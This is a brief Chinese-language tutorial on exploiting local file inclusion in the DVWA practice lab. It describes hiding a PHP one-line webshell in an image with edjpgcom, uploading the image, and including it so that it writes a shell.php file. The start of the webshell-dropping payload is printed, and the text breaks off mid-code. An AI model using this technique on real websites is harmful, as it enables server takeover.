LFI本地包含的简单利用原理实现

一、基本思路: 1、图片插入一句话木马。利用上传功能上传此图片。 2、利用文件包含漏洞,读取此含有一句话木马的图片,生成真正shell文件,然后拿下shell。 靶机使用dvwa 二、具体步骤: 1、制作一句话图片木马使用edjpgcom进行制作。如图将目标图片拖入文件夹中的 自动打开了软件,输入一句话木马 <?PHP fputs(fopen('shell.php','w'),'<?php @ev
相关文章
相关标签/搜索